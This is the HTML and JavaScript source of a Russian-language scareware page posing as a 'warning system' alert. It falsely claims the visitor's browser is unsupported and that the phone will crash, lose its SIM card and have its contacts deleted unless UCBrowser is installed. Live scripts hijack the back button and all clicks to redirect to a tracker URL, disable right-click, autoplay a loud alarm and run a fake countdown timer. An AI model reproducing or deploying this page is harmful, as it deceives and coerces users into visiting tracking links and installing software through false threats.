<!DOCTYPE html><html><head>
  <base href="">

  

<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<meta content="initial-scale=1" name="viewport">
<script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>
<script>


!function(){
  var t;
  try{
    for(t=0;10>t;++t)history.pushState({},"","#");
    onpopstate=function(t){
      t.state&&location.replace("http://dkped.voluumtrk.com/click")
    }
  }
  catch(o){}
}();





function goto(){
  PreventExitPop=!1;
  location.href = "http://dkped.voluumtrk.com/click";
}



</script>



<style type="text/css">.cf-hidden { display: none; } .cf-invisible { visibility: hidden; }</style></head><body onclick="goto();alert('Шаг 1: Нажмите Установить, чтобы установить UCBROWSER из AppStore\n\nШаг 2: Откройте приложение UCBROWSER, чтобы активировать последние обновления!');">
<style type="text/css">
a, abbr, acronym, address, applet, article, aside, audio, b, big, blockquote, body, canvas, caption, center, cite, code, dd, del, details, dfn, div, dl, dt, em, embed, fieldset, figcaption, figure, footer, form, h1, h2, h3, h4, h5, h6, header, hgroup, html, i, iframe, img, ins, kbd, label, legend, li, mark, menu, nav, object, ol, output, p, pre, q, ruby, s, samp, section, small, span, strike, strong, sub, summary, sup, table, tbody, td, tfoot, th, thead, time, tr, tt, u, ul, var, video {
	margin: 0;
	padding: 0;
	border: 0;
	font: inherit;
	vertical-align: baseline
}
article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section {
	display: block
}
body {
	line-height: 1
}
ol, ul {
	list-style: none
}
blockquote, q {
	quotes: none
}
blockquote:after, blockquote:before, q:after, q:before {
	content: '';
	content: none
}
table {
	border-collapse: collapse;
	border-spacing: 0
}
.clearfix:after {
	content: " ";
	display: block;
	height: 0;
	clear: both;
	overflow: hidden;
	visibility: hidden
}
.clearfix {
	display: block
}
body {
	font-family: Tahoma, Verdana, Arial;
	font-size: 14px;
	color: #222;
	background-color: #e7ebf2
}
h1 {
	text-align: center;
	font-size: 1.5em;
	background-color: #39579a;
	color: #fff;
	padding: 8px 0;
	border-bottom: 1px solid #1b316c
}
.wrapper {
	background-color: #fff;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	padding: 7px;
	width: 90%;
	margin: 0 auto;
	border: 1px solid #c4cde1;
	border-top: 0;
	max-width: 414px
}
.logo {
	display: block;
	margin: 5px auto
}
.blink {
	padding: 5px 20px;
	line-height: 18px;
	text-align: center
}
.bottom {
	width: 90%;
	margin: 20px auto 0;
	border: 1px solid #ccc;
	background-color: #f2f2f2;
	padding: 5px;
	border-radius: 10px;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px
}
.now {
	text-align: center;
	padding-top: 5px
}
#timer {
	background-color: #c23c39;
	color: #fff;
	padding: 5px 10px;
	border-radius: 5px;
	-moz-border-radius: 5px;
	-webkit-border-radius: 5px;
	display: inline-block;
	font-weight: 700;
     font-size:18px;
}
.rules {
	color: #1b316c;
	padding: 4px 5px;
	line-height: 18px
}
a {
	display: block;
	background-color: #39579a;
	border-radius: 9px;
	-moz-border-radius: 9px;
	-webkit-border-radius: 9px;
	padding: 10px 0;
	text-align: center;
	font-weight: 700;
	color: #fff;
	font-size: 1.6em;
	border-bottom: 1px solid #1b316c;
	margin: 7px auto 5px;
	text-decoration: none
}
.blink {
    -webkit-animation: blink .75s linear infinite;
    -moz-animation: blink .75s linear infinite;
    -ms-animation: blink .75s linear infinite;
    -o-animation: blink .75s linear infinite;
    animation: blink .75s linear infinite;
}
@-webkit-keyframes blink {
    0% { opacity: 1; }
    50% { opacity: 1; }
    50.01% { opacity: 0; }
    100% { opacity: 0; }
}

@-moz-keyframes blink {
    0% { opacity: 1; }
    50% { opacity: 1; }
    50.01% { opacity: 0; }
    100% { opacity: 0; }
}

@-ms-keyframes blink {
    0% { opacity: 1; }
    50% { opacity: 1; }
    50.01% { opacity: 0; }
    100% { opacity: 0; }
}

@-o-keyframes blink {
    0% { opacity: 1; }
    50% { opacity: 1; }
    50.01% { opacity: 0; }
    100% { opacity: 0; }
}

@keyframes blink {
    0% { opacity: 1; }
    50% { opacity: 1; }
    50.01% { opacity: 0; }
    100% { opacity: 0; }
}
</style>
<title>***Система предупреждения!***</title>
 <script language="JavaScript">
//Disable right click script III- By Renigade (renigade@mediaone.net)
//For full source code, visit http://www.dynamicdrive.com


var message="";
///////////////////////////////////
function clickIE() {
if (document.all) {
(message);
return false;
}
}
function clickNS(e) {
if (document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {
(message);
return false;
}
}
} // # end function
if (document.layers || navigator.userAgent.indexOf("Opera") >=0){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS;
}
else{
document.onmouseup=clickNS;
document.oncontextmenu=clickIE;
}


document.oncontextmenu=new Function("return false")
</script>

<script>
$(document).bind('keydown keypress', 'ctrl+s', function(){
$('#save').click(); 
return false;
});
</script>

 <script type="text/javascript">! function() {

alert("Система предупреждения!\n\n" + (getURLParameter("browser")) + " больше не поддерживается " + (getURLParameter("brand")) + ".\n\nИгнорирование этого предупреждения может принести вред вашему " + (getURLParameter("model")) + "!");</script>




<audio autoplay="autoplay" preload=""><source src="loudalert.mp3" type="audio/mpeg"><source src="loudalert.ogg" type="audio/ogg"></audio>
<h1>Система предупреждения!</h1>
<div class="wrapper"> <img class="logo" src="ucweb.png">
  <p class="blink" style="font-size:15px;font-weight:bold;"><font color="red"><strong><script>document.write(browser);</script> больше не поддерживается <script>document.write(brand);</script></strong></font></p>
  <div style="text-align:center;padding:5px 0;"><p class="text"><span id="timer">01:51</span></p></div>

 <p class="now" style="line-height:20px;margin-top:10px;"> <script>document.write(brand);</script> nтеперь требует, чтобы установить UCBrowser для <script>document.write(model);</script>, доступно в AppStore от.</p>
 <p class="now" style="line-height:20px;margin-top:10px;">Отказ перейти на UCBROWSER вызовет эти вопросы: <font color="red">К сбою <script>document.write(getURLParameter('model'))</script>Galaxy Note 3, разрядит батарею, Повреждение SIM-карту и удалять контакты!</font></p>
  <div class="bottom">
  <p class="rules">Чтобы решить эту проблему сейчас вам нужно):</p>
    <p class="rules">Шаг 1: Нажмите "Установить", чтобы установить UCBROWSER из AppStore</p>
    <p class="rules">Шаг 2: Откройте приложение UCBROWSER, чтобы активировать последние обновления!</p>
    <a href="http://dkped.voluumtrk.com/click" onclick="PreventExitPop = false;">Установить</a> </div>
</div>
<script type="text/javascript">
var javascript_countdown=function(){function r(){if(e<2){t=0}e=e-1}function i(e){if(e.toString().length<2){return"0"+e}else{return e}}function s(){var t,n,r;r=e%60;n=Math.floor(e/60)%60;t=Math.floor(e/3600);r=i(r);n=i(n);t=i(t);return n+":"+r}function o(){document.getElementById("timer").innerHTML=s()}function u(){document.getElementById("timer").innerHTML=n}var e=10;var t=1;var n="";return{count:function(){r();o()},timer:function(){javascript_countdown.count();if(t){setTimeout("javascript_countdown.timer();",1e3)}else{u()}},init:function(t){e=t;javascript_countdown.timer()}}}();javascript_countdown.init(120)
</script>

</body></html>